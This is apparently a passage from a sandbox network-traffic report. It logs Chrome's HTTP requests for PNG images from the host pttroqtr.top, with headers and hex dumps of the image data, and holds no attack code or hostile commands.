                                                                                                                                                                                            75192.168.2.5498038.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC599OUTGET /help/layout/images/43.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 18614
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"48b6-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 48 43 49 44 41 54 78 da ec dd 0b 9c 5c 65 99 e7 f1 e7 84 90 fb a5 93 90 1b 10 ba 02 26 01 01 d3 80 82 e3 a8 69 44 57 47 64 d3 cc 38 82 33 ba 69 c6 11 77 57 19 1a c6 dd 61 76 d5 34 5e 56 66 75 a0 59 76 dc 51 3f 23 95 45 06 65 5c 48 06 71 9c 19 95 0e 8c 0a 08 a4 43 80 90 c4 24 1d 20 e4 9e 74 a7 73 bf d5 be 4f 9d f7 a4 ab ab eb 72 6e 75 ff 7d 3f 9f a2 43 77 5d 4e 9d 3a 55 e7 5f ef e5 79 9d 54 2a 25 00 00 00 a8 2d 0e 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<HCIDATx\e&iDWGd83iwWav4^VfuYvQ?#Ee\HqC$ tsOrnu}?Cw]N:U_yT*%-!Bq8
                                                                                                                                                                                            2024-09-28 03:39:36 UTC2541INData Raw: 2d 7b e5 d1 81 68 33 b7 af 9f 38 5a 26 9f 99 bb bb b5 ff f8 c9 7c f7 9f ab a7 83 10 07 a0 e4 f4 83 a7 5c ab 51 68 57 7a 8b 94 be 15 ce d3 29 65 2a 07 03 a0 76 83 5b 4c a6 94 ab 97 89 10 07 20 93 76 03 2c 2e c3 e3 94 b2 ac 48 3e da d2 b8 b0 86 5f 9b 23 e6 32 86 43 14 d9 4e 9c 3c 25 23 cf 18 d1 50 cf f9 c0 d1 93 f2 44 6f 5f ba 1b f3 be 1d 03 d5 b6 79 37 95 6b e9 cb 11 1c fe 00 32 b4 4b e9 97 c1 5a 56 81 00 e7 3d b7 fe 1a 7d 5d 74 9f fd 8e d4 ff 12 65 37 49 19 57 43 f1 e1 f5 6a de 59 da 02 f5 f9 5f 6c 94 7f fa ed be 86 f9 80 7a 6c dd 9e f4 73 9e f6 c8 1a f9 e8 0b af 97 23 c0 e9 67 86 d6 78 d3 65 b2 fc 16 71 2c 5b 77 ea 48 01 80 41 da 05 d0 2a ee cc aa 52 b4 5a 95 6b 1c 5c 2e 3d 19 cf 2d ee f1 71 1a ae be 63 2e 7f 53 82 ed 5e 99 b1 cf 74 fb 3b a5 4c 6b f7 16
                                                                                                                                                                                            Data Ascii: -{h38Z&|\QhWz)e*v[L v,.H>_#2CN<%#PDo_y7k2KZV=}]te7IWCjY_lzls#gxeq,[wHA*RZk\.=-qc.S^t;Lk


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            76192.168.2.5498048.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC599OUTGET /help/layout/images/44.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 17267
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"4373-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 9b 00 00 00 fe 08 06 00 00 00 ec d6 a8 a5 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 43 08 49 44 41 54 78 5e ed 9d 07 78 5d 47 99 fe e9 b0 0b 2c 0b 5b 80 5d 76 61 97 0d a1 06 96 14 20 40 0a 81 40 0a a1 84 c0 d2 61 29 0b fc 69 09 65 e9 2d f4 b2 0b 59 fa 12 ca 12 42 e2 f4 84 f4 1e 77 5b 96 64 c9 2a 96 6d b9 48 2e b2 6c 4b b6 6c c9 b6 e4 99 ff f7 7e 67 ae 72 75 35 f7 de 99 73 cf 91 ee 95 de 5f 9e ef b1 e3 7b ce 9c 73 e6 cc 99 77 ca 37 df 3c c0 12 42 08 21 39 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92 3b 14 1b 42 08 21 b9 43 b1 21 84 10 92
                                                                                                                                                                                            Data Ascii: PNGIHDRsRGBgAMAapHYsodCIDATx^x]G,[]va @@a)ie-YBw[d*mH.lKl~gru5s_{sw7<B!9C!;B!C!;B!C!;B!C!
                                                                                                                                                                                            2024-09-28 03:39:36 UTC1194INData Raw: 27 a2 25 f9 1f 55 ce 32 20 3f b1 69 74 50 69 0c dc 90 78 2e 61 df 77 29 9c f6 50 76 e1 b6 cb a1 21 38 b0 9a 18 9e 35 9b 7f 6a 6d 8a d6 75 38 52 99 62 12 16 0d 02 69 e1 e8 e4 2d 3c 0a fb 7f a7 ad 37 bb e7 be e4 fa 65 44 39 53 e0 3e 8e 35 27 08 a3 bf f1 bb c9 10 d1 de 55 f2 43 ce d7 56 01 be 45 3e c0 6f 25 0d 12 54 ae 65 02 87 a6 02 43 99 d8 4a 1c 43 3a 78 a6 6e 79 af 3d 5f 94 6b 49 0f 08 0e 1f 88 73 55 83 93 49 01 6d d8 a1 dc a0 41 80 40 b0 b1 8d 13 0c d7 c0 61 40 7a fb 5a 06 32 ee 49 7a c1 06 74 28 7b 88 aa 81 86 a0 e6 7d b6 7b 2e e5 01 f6 c7 09 9b 0f 82 78 7e c0 9d 95 13 c8 2f 2c 30 86 eb 37 d6 ff 40 48 7a a4 be ea f9 5c e2 6d 88 48 17 98 b3 43 4f 39 a3 80 9a 69 a1 d8 10 42 1a 18 e9 99 61 bf 29 f4 4c 44 64 55 bc 44 c4 72 03 3d 41 78 06 06 0d 63 49 af 2d
                                                                                                                                                                                            Data Ascii: '%U2 ?itPix.aw)Pv!85jmu8Rbi-<7eD9S>5'UCVE>o%TeCJC:xny=_kIsUImA@a@zZ2Izt({}{.x~/,07@Hz\mHCO9iBa)LDdUDr=AxcI-


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            77192.168.2.5498028.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC599OUTGET /help/layout/images/45.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 33304
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"8218-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 81 a5 49 44 41 54 78 da ec 9d 0b 78 14 f5 bd f7 ff b9 ec 6e ee 09 21 24 dc 42 42 10 b9 08 12 2c a2 5c 94 20 1e db aa 55 5a 6b ad ad 3d a2 f6 9c 62 df b7 42 6d 6b 8f ed 6b c5 fa 9e 72 6a 5b c5 f6 7d d4 f6 b4 15 ce e9 cd 5a 2d 55 8b d6 23 12 14 10 28 ca b5 02 02 21 04 42 08 84 b0 b9 67 b3 b9 bc f3 9d ec 2c b3 bb b3 3b 33 bb b3 9b dd cd f7 f3 3c 03 9b dd d9 dd d9 99 ff cc ff 3b bf 6b ca c0 c0 80 20 84 10 42 08 21 89 45 2a 77 01 21 84 10 42 08 45 1c 21 84 10 42 08 a1 88 23 84 10 42 08
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxxn!$BB,\ UZk=bBmkkrj[}Z-U#(!Bg,;3<;k B!E*w!BE!B#B
                                                                                                                                                                                            2024-09-28 03:39:36 UTC16384INData Raw: 7c 40 9e 54 f5 44 5c aa 81 f2 0d a9 b9 79 96 6d 1b 04 05 3b 34 c4 96 8e c7 bf 61 7a 9f 63 5c f4 e7 fa ba fc 95 b6 6d ea 1b 85 a3 6f ae 4a b6 ae 0d b2 5b d5 d6 d8 8e 72 22 b3 75 ae 1b 84 50 c4 11 32 94 ec 7f 69 39 6a c2 2d 4a 96 df 53 7c e9 12 51 32 f3 76 e3 27 75 9b 7e f9 86 b4 4b 2f b7 6c fb fa 4f 1f e7 a0 0b 01 e2 0f ed 9f ba d2 b2 cf eb 7a f6 3b 61 75 7a c0 b8 e8 c9 0d 1d b7 89 d2 20 c9 26 e0 14 32 df 6e ab 3c b1 62 c1 ca 5c 0e 49 42 11 47 48 5c b3 26 19 7e 04 aa df 97 2d f8 8a c8 2c a8 88 eb ed ec fb 68 1f 47 9c 1f a9 33 f2 85 7d c9 7c 61 9b 7d b5 a5 05 95 51 4e 24 56 3d 57 93 91 ac 5d cd 6c 29 42 28 e2 08 89 57 f6 bf b4 1c d9 a8 09 ef 26 41 f1 df b1 73 be 64 b8 c0 aa 59 d2 a6 ce b5 ec b3 fa db 5a 39 f0 54 c2 cd 71 d3 e7 e5 6c 53 ab 41 39 91 b6 07 1f
                                                                                                                                                                                            Data Ascii: |@TD\ym;4azc\moJ[r"uP2i9j-JS|Q2v'u~K/lOz;auz &2n<b\IBGH\&~-,hG3}|a}QN$V=W]l)B(W&AsdYZ9TqlSA9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC847INData Raw: 21 4b ae af 56 f9 8f 68 a5 0c 71 12 b6 fa 37 56 fc c8 de f9 20 c0 ed f9 3e ee 85 ff f4 ba 59 dc 30 bc 2c 32 3c bc 28 fa 72 f4 68 6f 7e aa e0 47 70 03 40 88 03 30 dd 81 ae 5a dd 1c a9 4a 3b 32 d6 be 73 f9 95 9e 75 77 2e 2c 3a 7e 56 cd 79 21 6e 9e 27 2d 4c 06 ee 2e 39 3c 34 a7 f0 6f dd a3 6e 01 82 95 8c 96 b9 7b df a5 0d 71 12 16 07 96 97 ff 89 ee ed 39 03 5d 5e 57 ef ae e1 c2 82 4d 2a 92 17 9b fb df 6f a8 c8 e5 7e 95 d7 32 a4 72 db 47 52 fd 69 b3 15 6c 1b d8 0a 0b 00 21 0e c0 4c 09 74 55 56 98 b3 4f 9e 23 64 3d 7f 3c 57 e5 0c 8d aa bc b6 01 95 d3 3f a2 a2 cd fd b2 ae 2e 6e 85 1b e9 3b 22 23 77 ed 3a eb c1 8c 50 25 b7 5d ab 5c 3d ea dc 21 ce ec d7 b6 79 de d7 82 8c f4 59 8f c9 6e be 6b 7f 95 c7 55 e5 7c 6c 7d 8f 96 a9 91 58 44 15 1e 6a f7 0a 70 e7 ac c7 65
                                                                                                                                                                                            Data Ascii: !KVhq7V >Y0,2<(rho~Gp@0ZJ;2suw.,:~Vy!n'-L.9<4on{q9]^WM*o~2rGRil!LtUVO#d=<W?.n;"#w:P%]\=!yYnkU|l}XDjpe


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            78192.168.2.5498068.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC361OUTGET /help/layout/images/37.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 15414
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"3c36-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC15414INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3b c3 49 44 41 54 78 da ec dd 6d 8c 2b d7 7d df f1 c3 da 90 a5 44 ce 52 b0 62 29 96 93 a5 64 f9 b9 32 79 13 a3 68 d5 3a cb 2d fa a2 70 dd 5e de 06 86 e0 02 c5 72 e3 b8 2f 02 3b 97 d7 05 82 28 49 7b 79 0b 27 36 82 36 97 b7 71 d3 a2 86 7b b9 09 fa 60 38 85 78 51 37 7d d1 22 97 0b 37 ea 8b ba 16 d7 46 24 47 96 2c 6e 12 39 76 22 57 5c 5b b1 6c d5 32 3b 7f ee 7f 76 0f cf ce 90 c3 e1 cc f0 61 be 1f 80 b8 12 c9 1d ce 9c 79 fa cd 39 67 ce 14 86 c3 a1 01 00 00 c0 6a f9 4b 14 01 00 00 00 21
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<;IDATxm+}DRb)d2yh:-p^r/;(I{y'66q{`8xQ7}"7F$G,n9v"W\[l2;vay9gjK!


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            79192.168.2.5498078.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC361OUTGET /help/layout/images/38.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 11236
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2be4-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC11236INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd cb 75 db d8 96 06 60 54 af 3b b7 3b 02 b3 22 90 ee b4 27 a2 23 b0 6a d4 43 d3 11 58 15 81 e9 08 4a 8e c0 f4 f0 8e 4a 8e a0 e8 49 4f 2d 47 50 74 04 d7 8a c0 8d 2d 6d 5c b3 54 7a 10 e4 01 08 92 df b7 16 96 ea 21 91 20 08 1c fc 38 cf 9f be 7f ff 5e 01 00 b0 5b 7e 12 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxu`T;;"'#jCXJJIO-GPt-m\Tz! 8^[~888!!!@@@888


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            80192.168.2.5498058.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC361OUTGET /help/layout/images/39.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 16498
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"4072-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3f ff 49 44 41 54 78 da ec dd 7f 90 1c e7 5d e7 f1 47 8e 90 65 23 7b 57 b6 93 d8 4e ae 76 44 52 21 0e 90 5d 61 02 94 8b 63 47 21 c9 5d 2a 47 34 c2 a1 7c 05 14 3b 22 1c 15 7e 5c b4 ba 40 01 a9 a2 34 aa 3b 0e a8 3a 4e a3 22 bf ae 80 ec ec fd 41 91 3b 27 9a 85 e3 b8 23 04 cd 72 c1 47 2e 17 34 9b 14 31 1c 38 9a 05 13 27 c1 b1 76 1d 25 96 15 c9 7b fd 9d f9 b6 dd 9a 9d 1f fd e3 e9 ee a7 67 de af aa c9 3a da dd de 9e 9e ee 7e 3e fd fc dc b3 b3 b3 63 00 00 00 50 2c 37 71 08 00 00 00 08 71
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<?IDATx]Ge#{WNvDR!]acG!]*G4|;"~\@4;:N"A;'#rG.418'v%{g:~>cP,7qq
                                                                                                                                                                                            2024-09-28 03:39:36 UTC425INData Raw: 00 00 84 38 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 1c 02 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00
                                                                                                                                                                                            Data Ascii: 8Bq @!Bq @!Bq8@ Bq8@ B!8qBq @!Bq8@!B


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            81192.168.2.5498098.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:36 UTC361OUTGET /help/layout/images/36.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:36 UTC310INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:36 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 7852
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"1eac-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:36 UTC7852INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 1e 39 49 44 41 54 78 da ec dd 4f 72 db 46 da 07 60 64 2a fb f8 ab ca de ca 09 e2 9c c0 cc 2a 4b 2b ab d9 4c 95 e1 13 44 39 81 e9 13 44 3e 41 a8 aa d9 cc 2a d2 32 ab a1 4e 10 e9 04 23 ed 53 35 d6 05 92 0f 6d b5 12 8e 22 fe 69 10 04 5f 80 cf 53 c5 d2 8c 23 89 54 83 04 7e e8 3f 6f 7f f2 fb ef bf 57 00 00 0c cb 27 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00
